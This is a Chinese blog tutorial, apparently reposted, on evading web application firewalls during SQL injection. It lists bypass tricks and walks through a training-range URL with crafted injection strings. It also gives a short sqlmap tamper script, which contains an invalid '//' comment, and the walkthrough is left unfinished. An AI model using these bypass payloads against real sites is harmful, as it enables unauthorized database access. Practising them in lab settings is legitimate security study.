ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

sqlmap绕华夫

2022-03-30 00:36:05  阅读:271  来源: 互联网

标签:sqlmap -- waf WAF 绕过 绕华夫 payload


0x001 waf介绍

Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)
核心目的:防御网站被入侵。
具体手段:检测到你的入侵者,然后拦截你当前访问的页面或者是跳转其他页面,或者是直接禁止你的ip访问。
日常生活中,有些网站不一定安装了WAF,但是他可能会有自己的防护策略,过滤你的恶意传参数据,例如传参不能出现union,不能出现and 1=1等等等
常见的waf:https://www.cnblogs.com/charon1937/p/13799467.html
waf实现的核心机制一般是:正则表达式
绕waf的核心原则是:先在本地搭建环境测试

0x002 常见的绕过手法

1、用其他函数、写法替代 $a=get_defined_functions();$a['internal']841; (这个是一句话木马)
2、大小写绕过(有些老WAF大小写就能绕)
3、替换绕过:有些过滤规则强行删除检测到的代码,然后执行
4、编码绕过:网站因为功能需要有编解码,然后因为WAF不认识编码后的值然后绕过了
5、注释绕过:WAF有的时候会认为注释后的东西是安全的,然后可以尝试hpp
6、白名单绕过:本地访问可能不拦截、管理员权限 (1、文件白名单 )
7、垃圾数据填充:写个一大堆数据,然后传参,WAF只检测其中一部分绕过了

1、4、7是比较常见的

常见替代:
空格替代+(+是因为URL编码) 或者是/**/
sleep() 用 sleep/**/()或者`sleep`()代替

0x003 绕waf的sqlmap脚本编写

这里以机构的靶场为例http://p9kj8014.ia.aqlab.cn/index.php?id=1

①http://p9kj8014.ia.aqlab.cn/index.php?id=1 and 1=1
image
发现被拦截了

②我们发现构造http://p9kj8014.ia.aqlab.cn/index.php?id=1/*order by 1&id=1 order by 2 -- qwe*/ 这种特殊的url语句可以帮助我们绕过waf

③开始编写sqlmap的脚本
https://www.webshell.cc/7162.html

#!/usr/bin/env python


import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload=payload + '-- qwe*/' //在所有的url语句后加上-- qwe*/
    return payload

④我们现在就可以用sqlmap跑包了
抓包之后构建语句

sqlmap.py -r maoshe.txt --tamper smart01.py
image

这里要选择no因为我们* 并不算注入点
待更新(sqlmap暂时没有跑出来)

标签:sqlmap,--,waf,WAF,绕过,绕华夫,payload
来源: https://www.cnblogs.com/linzexing/p/16074591.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有